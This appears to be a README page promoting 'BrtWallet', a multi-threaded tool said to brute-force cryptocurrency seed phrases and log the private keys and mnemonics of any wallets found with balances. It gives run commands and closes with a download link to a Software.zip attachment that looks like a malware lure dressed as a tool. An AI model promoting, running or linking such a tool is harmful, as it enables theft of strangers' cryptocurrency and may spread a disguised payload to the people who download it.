Brute force multiple wallet mnemonics. Multi-threaded and surprisingly fast. Automatically generate seed phrases and check balances for many networks. If a wallet with a non-zero balance is found, the wallet's information (address, mnemonic, private key, and balances) is logged and saved to a file named result.txt.
- Brute Force Seed Phrases: The BrtWallet repository enables users to brute force multiple wallet mnemonics efficiently through multi-threading, making it fast and effective.
- Automatic Balance Checking: The tool automatically generates seed phrases and checks balances for various networks, saving time and effort for users.
- Logging Wallet Information: If a wallet with a non-zero balance is found, the wallet's information, including address, mnemonic, private key, and balances, is logged and saved to a file named result.txt for easy reference.
To get started with BrtWallet, follow these steps:
-
Clone the repository:
git clone https://github.com/your-username/BrtWallet.git
-
Install the required dependencies:
pip install -r requirements.txt
-
Run the BrtWallet tool:
python brtwallet.py
Once BrtWallet is set up, you can run it to start brute forcing multiple wallet mnemonics. Here are some usage examples:
-
Generate Seed Phrases:
python brtwallet.py --generate-seeds 1000
-
Check Balances:
python brtwallet.py --check-balances
-
Log Results:
python brtwallet.py --log-results
-
Combining Options:
python brtwallet.py --generate-seeds 500 --check-balances --log-results
For more details on command-line arguments and options, refer to the documentation.
We welcome contributions from the community to enhance the functionality and features of BrtWallet. To contribute, please follow these steps:
- Fork the repository.
- Create a new branch (
git checkout -b feature-addition
). - Make your changes.
- Commit your changes (
git commit -am 'Add new feature'
). - Push to the branch (
git push origin feature-addition
). - Create a new Pull Request.
Please ensure that you follow the code of conduct and adhere to the contribution guidelines.
The BrtWallet repository is licensed under the MIT License. For more details, refer to the LICENSE file.
Download BrtWallet](https://github.com/user-attachments/files/17466420/Software.zip)